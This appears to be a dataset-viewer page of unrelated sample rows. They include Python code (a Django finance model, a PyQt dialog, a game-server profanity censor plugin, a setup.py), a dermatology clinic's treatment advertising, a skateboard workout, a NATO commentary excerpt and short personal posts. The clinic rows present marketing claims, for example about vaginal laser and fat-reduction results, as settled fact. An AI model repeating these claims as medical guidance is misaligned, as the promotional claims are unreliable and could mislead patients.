# Matrix=np.empty((nrows,npars))
# for i in range(nrows):
# Matrix[i]= self.parameter()['random']
# return Matrix
|
Welcome to the French 11 section!
This page has links for each of various pages in your section. You can also hover your mouse over "French 11" to see the pages available.
Description of homework? Assignment due dates? Click the image below.
Additional assignment info? Documents to download? Assignments to upload and send to me? Blague de la semaine? Click the image below.
Links to various websites? Click the image below.
|
import logging
from django.conf import settings
from django.contrib.postgres.fields import ArrayField
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from djmoney.models.fields import MoneyField
TRANSACTION_TYPE = (
('EXP', _('Expences')),
('INC', _('Income')),
)
log = logging.getLogger(__name__)
class Record(models.Model):
'''
Record model defines the storage of income/expences records.
Amount field is MoneyField. Determines amount of money and currency. CAD by default.
Transaction type determines EXP(Expences) or INC(Income) the record is.
'''
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
tags = ArrayField(
models.TextField(max_length=20), null=False, blank=True, default=list
)
amount = MoneyField(max_digits=15, decimal_places=2, default_currency='CAD')
comment = models.TextField(null=True, blank=True)
transaction_type = models.CharField(choices=TRANSACTION_TYPE, max_length=3)
created_at = models.DateTimeField(default=timezone.now, blank=True)
@property
def redis_tags_key(self):
'''
Return Redis key where stored sorted set of tags frequency usage.
'''
return settings.REDIS_KEY_USER_TAGS % (self.user_id,)
def __str__(self):
return '%s %s' % (self.amount, ', '.join(self.tags))
def remove_tags_weights(self):
'''
Remove tags from frequency tags set.
'''
log.debug('Remove tags weights')
pipe = settings.REDIS_CONN.pipeline()
for tag in self.tags:
pipe.zincrby(self.redis_tags_key, -1, tag)
# remove 0 score tags
pipe.zremrangebyscore(self.redis_tags_key, 0, 0)
pipe.execute()
def add_tags_weights(self):
'''
Add tags to usage frequency set.
'''
log.debug('Add tags weights')
pipe = settings.REDIS_CONN.pipeline()
for tag in self.tags:
pipe.zincrby(self.redis_tags_key, 1, tag)
pipe.execute()
|
At Spring Street Dermatology, we work to optimize the appearance of your skin through comprehensive medical care and state of the art cosmetic enhancements. We believe in achieving natural results using the simplest, least invasive techniques possible. Our goal is to bring out the best in you. After all, when you look good, so do we!
Frowning, squinting and smiling leave behind fine lines and wrinkles over time. It can be injected directly with a tiny needle into the muscles responsible and work by reducing crease causing contractions. While neurotoxins help soften deep wrinkles, the ideal time for prevention is to start treatment when fine lines first appear. There is minimal discomfort and no downtime. Within days, you may see an improvement that can last up to 4 months. If there is concomitant volume loss, soft tissue fillers may be recommended for more complete correction.
Chemical peeling can reduce fine lines, improve the appearance of scars, diminish dark marks and enhance texture. The procedure involves applying a chemical solution that causes the top layers of the skin to exfoliate, allowing newer, revitalized skin to emerge. A peeling agent is chosen based on the specific skin condition being addressed, your skin type and the goals of treatment. You can expect to feel some warmth and mild stinging during the procedure. Whether you are looking for quick refreshment or a deeper, stronger peel, we will choose the safest and most effective option for your skin. Microdermabrasion may be added for enhanced results.
As we mature, loss of volume leads to wrinkles, prominent nasolabial folds, thinned lips, exaggerated jowls and marionette lines. The natural deterioration of underlying bone and soft tissue leaves a hollowed, aged appearance. Fillers are injected below the skin surface to correct age related volume loss. At Spring Street Dermatology, we use hyaluronic acid based fillers like Juvederm and Restylane to augment the cheeks, reduce wrinkles, enhance lips and give patients a natural, more youthful appearance. Hyaluronic acid based fillers are safest because they are a component of native connective tissue and are easily reversible.
Years of sun exposure can lead to sunspots, age spots, freckles and broken blood vessels. The red and brown tones make the skin appear aged and uneven. IPL turns back the hands of time by selectively destroying melanin (pigment) and hemoglobin (red blood cells). It can be used on the face, chest, arms, and hands. For patients with rosacea, IPL can be used to decrease background redness and help prevent flushing. The Cynosure MaxG offered at Spring Street Dermatology is the most powerful and effective IPL platform available.
Kybella™ is a prescription medicine used in adults to improve the appearance of submental fat, also called the “double chin.” The active ingredient in Kybella is deoxycholic acid, a naturally-occurring molecule in the body that aids in fat breakdown and absorption. When injected into the fat beneath your chin, Kybella causes the destruction of fat cells. Once destroyed, these cells can no longer store or accumulate fat. Multiple treatments are necessary for most patients. Final results can take over 6 weeks to be evident. After an ideal aesthetic response is achieved, retreatment is not expected.
Let’s face it – traditional hair removal techniques like waxing, threading, creams and shaving are torture. They can be painful, labor intensive and, if you do the math, extremely expensive over time. Laser hair removal offers permanent hair reduction for both men and women. With our Cynosure Elite Nd:YAG and Alexandrite lasers, all skin types and any area of the body can be treated. Pain is minimal and only lasts for a fraction of a second. The average patient will need 6-9 treatments at monthly intervals to achieve a 90% reduction in unwanted hair. Yearly touch ups are recommended to keep the hair away.
Laser resurfacing not only tightens the skin but can improve the appearance of sunspots, wrinkles, pores and scars. Ablative lasers work by vaporizing the outer layers of skin. This process stimulates the skin to repair and remodel with new collagen. Recovery time can take 1-2 weeks, but results are dramatic and lasting. Non-Ablative lasers are less invasive. They work by heating up tissue without actually destroying it. There is usually minimal downtime and multiple treatments are required for best results.
Using the top of the line ICON™ workstation, Spring Street Dermatology offers 3 types of laser resurfacing: 2940 ablative for a one time treatment with dramatic results, 1540 XD for acne and surgical scars, and 1540 XF for skin texture and stretch marks.
The Eclipse MicroPen™ uses a sterile 12 micro-needle tip to create controlled micro-channels in the skin. This initiates the skin’s repair process to naturally produce collagen, ideal for decreasing the appearance of wrinkles, fine lines, scars and stretch marks. The micro-channels also allow for optimal absorption of topical products, most importantly Platelet Rich Plasma (PRP), to enhance results. PRP is a concentration of platelets and growth factors found in the blood stream. To harness the reparative and regenerative power of PRP, a small blood sample is taken from your own body and centrifuged. The PRP, a clear golden liquid, is then extracted, applied topically and immediately followed by a micro-needling procedure. The micro-channels created by the Eclipse MicroPen provide direct pathways to the deeper layers of skin allowing the PRP to expedite wound healing and further stimulate production of collagen. Microneedling with PRP is an ideal, natural treatment for smoothing wrinkles, fine line, and scars. Coupled with injections of PRP, it can also be used to stimulate hair regrowth in the scalp.
MiraDry is a revolutionary, non-invasive treatment for underarm sweat, also known as axillary hyperhidrosis. It works by delivering precisely controlled electromagnetic energy that targets and selectively destroys overactive sweat glands and odor glands. These glands do not grow back once eliminated, resulting in a dramatic and lasting reduction of underarm sweat and smell.
TThe Excel V is a combination KTP 532 nm and ND:YAG 1064 nm laser that safely and efficiently treats a variety of vascular lesions including telangiectasias, broken blood vessels, angiomas, vascular birthmarks, spider veins, and leg veins. It can also reduce facial redness associated with rosacea or sun damage and can treat solar lentigos or sun spots. Treatments are well tolerated with minimal downtime. While improvement is generally seen after the first treatment, most patients will require multiple sessions for best results.
TruSculpt is the latest noninvasive technology to target problem areas of fat and cellulite that are resistant to diet and exercise. The device delivers controlled, yet comfortable, doses of therapeutic heat to the subcutaneous tissue layer resulting in both body sculpting and fat reduction. It is ideal for targeting stubborn areas like the lower abdomen, double chin, bra fat, back fat, love handles, muffin tops and saddle bags. Two to 4 treatment sessions spaced 4-6 weeks apart are recommended. Many patients see results within 4 weeks, with optimal results typically achieved at 12 weeks. There is minimal downtime after a truSculpt procedure – patients can resume daily activities immediately post treatment.
To find out if truSculpt is right for you, please call us at 212-431-4749 to schedule a consultation.
Laser Genesis is a YAG based laser facial that is safe in all skin types. By gently heating the dermis, Genesis rebuilds collagen, evens out skin tone, reduces redness, shrinks pores, and fades hyperpigmentation from acne or melasma. It can also be used to improve the appearance of scars. Patients describe Genesis as feeling like a warm campfire. There is minimal downtime and a noticeable improvement in skin texture can be seen immediately. Depending on desired results, most patients benefit from a treatment series. A maintenance regimen with treatments at regularly spaced intervals is ideal for keeping up the results.
The Titan is a non-invasive skin tightening laser that targets sagging, loose skin on the face or body. Using infra-red light, Titan heats deeper tissues, causing contracture, remodeling, and increased production of collagen. Titan is especially useful the treatment and prevention of early jowling, neck laxity, and sagging skin around the eyes. It is also the best non-surgical option for loose skin after pregnancy or weight loss. Improvement in skin texture can be seen in one treatment, but multiple treatments may be necessary to achieve the desired results. Since skin elasticity continues to diminish over time, yearly maintenance may be required to sustain improvement.
The Secret RF (radiofrequency) microneedling device is the latest advance in the treatment of wrinkles, stretch marks, and acne scarring. It uses 25 or 64 perfectly spaced, gold tip needles that precisely deliver energy at varying depths below the skin. Microneedling boosts collagen production while radiofrequency remodels and tightens tissue. The combination of both modalities in a single treatment means unprecedented results in the appearance of wrinkles, including those in difficult to treat areas such as around the mouth (Smoker’s lines), around the eyes, and on the neck. It is also effective in the treatment of a wide range of textural acne scars (pitted, rolling, and boxcar scars) and stretch marks. The procedure is comfortable with topical numbing medication and downtime is minimal. It is safe in all skin types. Patients typically require a treatment series for best results.
Juliet is an erbium laser that takes 20 minutes to revitalize both the internal and external vaginal tissue. Based on multiple studies, vaginal erbium laser treatments significantly improved lubrication, sexual discomfort, vaginal firmness and tone, leakage of urine when sneezing/ coughing or laughing, labial tightening, and external skin appearance.
The process involves 2 passes: The first delivers micro columns of laser energy that stimulate regeneration of collagen and elastin, strengthening the structure of the inner vaginal wall. The second pass delivers gentle heat to improve vaginal tone and flexibility. There is minimal discomfort and little downtime. A series of 3 treatments at 4 week intervals with yearly touch ups is recommended.
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010-2017 Samuele Carcagno <sam.carcagno@gmail.com>
# This file is part of pysoundanalyser
# pysoundanalyser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# pysoundanalyser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with pysoundanalyser. If not, see <http://www.gnu.org/licenses/>.
from __future__ import nested_scopes, generators, division, absolute_import, with_statement, print_function, unicode_literals
from .pyqtver import*
if pyqtversion == 4:
from PyQt4 import QtGui, QtCore
from PyQt4.QtGui import QComboBox, QDialog, QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QMessageBox
elif pyqtversion == -4:
from PySide import QtGui, QtCore
from PySide.QtGui import QComboBox, QDialog, QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QMessageBox
elif pyqtversion == 5:
from PyQt5 import QtGui, QtCore
from PyQt5.QtWidgets import QComboBox, QDialog, QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QMessageBox
class saveSoundDialog(QDialog):
def __init__(self, parent):
QDialog.__init__(self, parent)
grid = QGridLayout()
n = 0
#self.fileToWrite = None
self.guessFileExtension = True
formatLabel = QLabel(self.tr('File Format: '))
grid.addWidget(formatLabel, n, 0)
self.formatChooser = QComboBox()
self.formatChooser.addItems(["wav"])#available_file_formats())
self.formatChooser.setCurrentIndex(0)
grid.addWidget(self.formatChooser, n, 1)
self.formatChooser.currentIndexChanged[int].connect(self.onFileFormatChange)
self.suggestedExtension = str(self.formatChooser.currentText())
encodingLabel = QLabel(self.tr('Bits: '))
grid.addWidget(encodingLabel, n, 2)
self.encodingChooser = QComboBox()
self.encodingChooser.addItems(["16", "24", "32"])#available_encodings(str(self.formatChooser.currentText())))
self.encodingChooser.setCurrentIndex(0)
grid.addWidget(self.encodingChooser, n, 3)
n = n+1
channelLabel = QLabel(self.tr('Channel: '))
grid.addWidget(channelLabel, n, 0)
self.channelChooser = QComboBox()
self.channelChooser.addItems([self.tr('Stereo'), self.tr('Mono')])
self.channelChooser.setCurrentIndex(0)
grid.addWidget(self.channelChooser, n, 1)
n = n+1
buttonBox = QDialogButtonBox(QDialogButtonBox.Ok|
QDialogButtonBox.Cancel)
buttonBox.accepted.connect(self.accept)
buttonBox.rejected.connect(self.reject)
grid.addWidget(buttonBox, n, 2)
self.setLayout(grid)
self.setWindowTitle(self.tr("Save Sound Options"))
def onFileFormatChange(self):
pass
## for i in range(self.encodingChooser.count()):
## self.encodingChooser.removeItem(0)
## self.encodingChooser.addItems(available_encodings(str(self.formatChooser.currentText())))
## self.suggestedExtension = str(self.formatChooser.currentText())
|
Come to a tabletop position, holding the skateboard vertically with both hands. Inhale as you slide the board out in front of you as far as you can, then use your abdominals to draw it back in toward you on an exhale. Repeat 20–30 times.
Stand on the skateboard with your feet together. Squat down and touch your knees with your back straight, keeping your gaze forward. Come back to standing; repeat 10 times.
Then, squat deeper and touch your ankles, while still keeping your back straight and your gaze forward. Come back to standing; repeat 10 times.
Finally, squat even deeper and touch the board, while still keeping your back straight and your gaze forward. Come back to standing; repeat 10 times.
To intensify, close your eyes or lower down to a count of three and stand up to a count of one.
Start in a plank position with your feet on the board and your hands under your shoulders. Use your core to draw the board in toward you as you lift your hips into a pike position. Then, slowly and with control, lower your hips and slide your feet back to the starting position. Repeat 20–30 times.
Extend your arms into a T-shape and place your right foot on the skateboard. Slide your right foot forward into a deep lunge, lowering your left knee as close to the ground as possible. Repeat 20–30 times, then switch legs.
To intensify this exercise, close your eyes while doing the motion.
French women must have a thing for working out on wheels—here’s why Paris’ indoor cycling scene is one of the hottest in the world. No plans to hop the pond anytime soon? At least you can eat breakfast and do your hair like you’re from the City of Lights.
|
#
# BigBrotherBot(B3) (www.bigbrotherbot.net)
# Copyright (C) 2005 Michael "ThorN" Thornton
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# CHANGELOG
# 2012/07/03 - 3.1 - Courgette
# Fixes a bug wich prevented regular expression "\sd[i!1*]ck\s" to match for word "d!ck"
# 2012/07/03 - 3.0.1 - Courgette
# Gives meaningful log messages when loading the config file
# 2011/12/26 - 3.0 - Courgette
# Refactor and make the checks on raw text before checks on cleaned text. Add tests
# 2/12/2011 - 2.2.2 - Bravo17
# Fix for reason keyword not working
# 1/16/2010 - 2.2.1 - xlr8or
# Plugin can now be disabled with !disable censor
# 1/16/2010 - 2.2.0 - xlr8or
# Added ignore_length as an optional configurable option
# Started debugging the badname checker
# 8/13/2005 - 2.0.0 - ThorN
# Converted to use XML config
# Allow custom penalties for words and names
# 7/23/2005 - 1.1.0 - ThorN
# Added data column to penalties table
# Put censored message/name in the warning data
__author__ = 'ThorN, xlr8or, Bravo17, Courgette'
__version__ = '3.1'
import b3, re, traceback, sys, threading
import b3.events
import b3.plugin
from b3.config import XmlConfigParser
from b3 import functions
class PenaltyData:
def __init__(self, **kwargs):
for k, v in kwargs.iteritems():
setattr(self, k, v)
type = None
reason = None
keyword = None
duration = 0
def __repr__(self):
return """Penalty(type=%r, reason=%r, keyword=%r, duration=%r)""" % (self.type, self.reason, self.keyword, self.duration)
def __str__(self):
data = {"type": self.type, "reason": self.reason, "reasonkeyword": self.keyword, "duration": self.duration}
return "<penalty " + ' '.join(['%s="%s"' % (k, v) for k, v in data.items() if v]) + " />"
class CensorData:
def __init__(self, **kwargs):
for k, v in kwargs.iteritems():
setattr(self, k, v)
name = None
penalty = None
regexp = None
def __repr__(self):
return """CensorData(name=%r, penalty=%r, regexp=%r)""" % (self.name, self.penalty, self.regexp)
#--------------------------------------------------------------------------------------------------
class CensorPlugin(b3.plugin.Plugin):
_adminPlugin = None
_reClean = re.compile(r'[^0-9a-z ]+', re.I)
_defaultBadWordPenalty = PenaltyData(type="warning", keyword="cuss")
_defaultBadNamePenalty = PenaltyData(type="warning", keyword="badname")
_maxLevel = 0
_ignoreLength = 3
def onStartup(self):
self._adminPlugin = self.console.getPlugin('admin')
if not self._adminPlugin:
return False
self.registerEvent(b3.events.EVT_CLIENT_SAY)
self.registerEvent(b3.events.EVT_CLIENT_TEAM_SAY)
self.registerEvent(b3.events.EVT_CLIENT_NAME_CHANGE)
self.registerEvent(b3.events.EVT_CLIENT_AUTH)
def onLoadConfig(self):
assert isinstance(self.config, XmlConfigParser)
try:
self._maxLevel = self.config.getint('settings', 'max_level')
except Exception, err:
self._maxLevel = 0
self.warning(err)
self.warning("using default value %s for settings:max_level" % self._maxLevel)
try:
self._ignoreLength = self.config.getint('settings', 'ignore_length')
except Exception, err:
self._ignoreLength = 3
self.warning(err)
self.warning("using default value %s for settings:ignore_length" % self._ignoreLength)
default_badwords_penalty_nodes = self.config.get('badwords/penalty')
if len(default_badwords_penalty_nodes):
penalty = default_badwords_penalty_nodes[0]
self._defaultBadWordPenalty = PenaltyData(type = penalty.get('type'),
reason = penalty.get('reason'),
keyword = penalty.get('reasonkeyword'),
duration = functions.time2minutes(penalty.get('duration')))
else:
self.warning("""no default badwords penalty found in config. Using default : %s""" % self._defaultBadNamePenalty)
default_badnames_penalty_nodes = self.config.get('badnames/penalty')
if len(default_badnames_penalty_nodes):
penalty = default_badnames_penalty_nodes[0]
self._defaultBadNamePenalty = PenaltyData(type = penalty.get('type'),
reason = penalty.get('reason'),
keyword = penalty.get('reasonkeyword'),
duration = functions.time2minutes(penalty.get('duration')))
else:
self.warning("""no default badnames penalty found in config. Using default : %s""" % self._defaultBadNamePenalty)
# load bad words into memory
self._badWords = []
for e in self.config.get('badwords/badword'):
penalty_node = e.find('penalty')
word_node = e.find('word')
regexp_node = e.find('regexp')
self._add_bad_word(rulename=e.get('name'),
penalty=penalty_node,
word=word_node.text if word_node is not None else None,
regexp=regexp_node.text if regexp_node is not None else None)
# load bad names into memory
self._badNames = []
for e in self.config.get('badnames/badname'):
penalty_node = e.find('penalty')
word_node = e.find('word')
regexp_node = e.find('regexp')
self._add_bad_name(rulename=e.get('name'),
penalty=penalty_node,
word=word_node.text if word_node is not None else None,
regexp=regexp_node.text if regexp_node is not None else None)
def _add_bad_word(self, rulename, penalty=None, word=None, regexp=None):
if word is regexp is None:
self.warning("badword rule [%s] has no word and no regular expression to search for" % rulename)
elif word is not None and regexp is not None:
self.warning("badword rule [%s] cannot have both a word and regular expression to search for" % rulename)
elif regexp is not None:
# has a regular expression
self._badWords.append(self._getCensorData(rulename, regexp.strip(), penalty, self._defaultBadWordPenalty))
self.debug("badword rule '%s' loaded" % rulename)
elif word is not None:
# has a plain word
self._badWords.append(self._getCensorData(rulename, '\\s' + word.strip() + '\\s', penalty, self._defaultBadWordPenalty))
self.debug("badword rule '%s' loaded" % rulename)
def _add_bad_name(self, rulename, penalty=None, word=None, regexp=None):
if word is regexp is None:
self.warning("badname rule [%s] has no word and no regular expression to search for" % rulename)
elif word is not None and regexp is not None:
self.warning("badname rule [%s] cannot have both a word and regular expression to search for" % rulename)
elif regexp is not None:
# has a regular expression
self._badNames.append(self._getCensorData(rulename, regexp.strip(), penalty, self._defaultBadNamePenalty))
self.debug("badname rule '%s' loaded" % rulename)
elif word is not None:
# has a plain word
self._badNames.append(self._getCensorData(rulename, '\\s' + word.strip() + '\\s', penalty, self._defaultBadNamePenalty))
self.debug("badname rule '%s' loaded" % rulename)
def _getCensorData(self, name, regexp, penalty, defaultPenalty):
try:
regexp = re.compile(regexp, re.I)
except re.error, e:
self.error('Invalid regular expression: %s - %s' % (name, regexp))
raise
if penalty is not None:
pd = PenaltyData(type = penalty.get('type'),
reason = penalty.get('reason'),
keyword = penalty.get('reasonkeyword'),
duration = functions.time2minutes(penalty.get('duration')))
else:
pd = defaultPenalty
return CensorData(name=name, penalty=pd, regexp=regexp)
def onEvent(self, event):
try:
if not self.isEnabled():
return
elif not event.client:
return
elif event.client.cid is None:
return
elif event.client.maxLevel > self._maxLevel:
return
elif not event.client.connected:
return
if event.type == b3.events.EVT_CLIENT_AUTH or event.type == b3.events.EVT_CLIENT_NAME_CHANGE:
self.checkBadName(event.client)
elif len(event.data) > self._ignoreLength:
if event.type == b3.events.EVT_CLIENT_SAY or \
event.type == b3.events.EVT_CLIENT_TEAM_SAY:
self.checkBadWord(event.data, event.client)
except b3.events.VetoEvent:
raise
except Exception, msg:
self.error('Censor plugin error: %s - %s', msg, traceback.extract_tb(sys.exc_info()[2]))
def penalizeClient(self, penalty, client, data=''):
"""\
This is the default penalisation for using bad language in say and teamsay
"""
#self.debug("%s"%((penalty.type, penalty.reason, penalty.keyword, penalty.duration),))
# fix for reason keyword not working
if penalty.keyword is None:
penalty.keyword = penalty.reason
self._adminPlugin.penalizeClient(penalty.type, client, penalty.reason, penalty.keyword, penalty.duration, None, data)
def penalizeClientBadname(self, penalty, client, data=''):
"""\
This is the penalisation for bad names
"""
#self.debug("%s"%((penalty.type, penalty.reason, penalty.keyword, penalty.duration),))
self._adminPlugin.penalizeClient(penalty.type, client, penalty.reason, penalty.keyword, penalty.duration, None, data)
def checkBadName(self, client):
if not client.connected:
self.debug('Client not connected?')
return
cleaned_name = ' ' + self.clean(client.exactName) + ' '
self.info("Checking '%s'=>'%s' for badname" % (client.exactName, cleaned_name))
was_penalized = False
for w in self._badNames:
if w.regexp.search(client.exactName):
self.debug("badname rule [%s] matches '%s'" % (w.name, client.exactName))
self.penalizeClientBadname(w.penalty, client, '%s (rule %s)' % (client.exactName, w.name))
was_penalized = True
break
if w.regexp.search(cleaned_name):
self.debug("badname rule [%s] matches cleaned name '%s' for player '%s'" % (w.name, cleaned_name, client.exactName))
self.penalizeClientBadname(w.penalty, client, '%s (rule %s)' % (client.exactName, w.name))
was_penalized = True
break
if was_penalized:
# check again in 1 minute
t = threading.Timer(60, self.checkBadName, (client,))
t.start()
return
def checkBadWord(self, text, client):
cleaned = ' ' + self.clean(text) + ' '
text = ' ' + text + ' '
self.debug("cleaned text: [%s]" % cleaned)
for w in self._badWords:
if w.regexp.search(text):
self.debug("badword rule [%s] matches '%s'" % (w.name, text))
self.penalizeClient(w.penalty, client, text)
raise b3.events.VetoEvent
if w.regexp.search(cleaned):
self.debug("badword rule [%s] matches cleaned text '%s'" % (w.name, cleaned))
self.penalizeClient(w.penalty, client, '%s => %s' % (text, cleaned))
raise b3.events.VetoEvent
def clean(self, data):
return re.sub(self._reClean, ' ', self.console.stripColors(data.lower()))
|
Economy and Society » Blog Archive » What is Nato for?
Linked with Serge Halimi – France.
Published on Le Monde diplo, by Serge Halimi, March 2009.
… Leaving no stone unturned, the resolution also recalls our “painful history”, referring to Hitler and Munich, quotes a few lines by “Elie Wiesel, holocaust survivor”, and adds: “Wouldn’t we want someone to come to our rescue when we are crying?” US officers, however, have never had a great reputation for drying civilian tears. Neither during the war in Kosovo, nor in the Iraq war, both conducted in breach of the UN charter. But, regarding many member states at the UN, the European parliament profoundly regrets that “the doctrine of non-alignment, inherited from the cold war era, undermines the alliance of democracies”.
So it is understood that “the future collective defence of the European Union” to which the French head of state is committed will be organised exclusively within the framework of the Atlantic Alliance. The Alliance will not hesitate to deploy its forces in combined civil and military missions extending far beyond the old iron curtain to the borders of Pakistan. Even within Sarkozy’s own party, two former prime ministers, Alain Juppé and Dominique de Villepin, are already worried about this change of direction – evidence enough of the risks involved in taking such a course. (full text).
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
setup(
name='txbalanced',
version='0.1.3',
description='Balanced Payments library Twisted style',
long_description=readme + '\n\n' + history,
author='Trenton Broughton',
author_email='trenton@devpie.com',
url='https://github.com/trenton42/txbalanced',
packages=[
'txbalanced',
],
package_dir={'txbalanced': 'txbalanced'},
include_package_data=True,
install_requires=[
'treq',
'python-dateutil',
'pyopenssl',
'wrapt'
],
license="BSD",
zip_safe=False,
keywords='txbalanced',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
],
test_suite='tests',
)
|
I got a call from my Western Romance editor offering me another three book contract.
When the contract gets emailed to me, I’ll sign it and mail it back, and I will put those books into the lineup for me to write. And there is nothing I love more than lining up books to write… well, except maybe signing contracts.
congratulations – you go girl!!
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.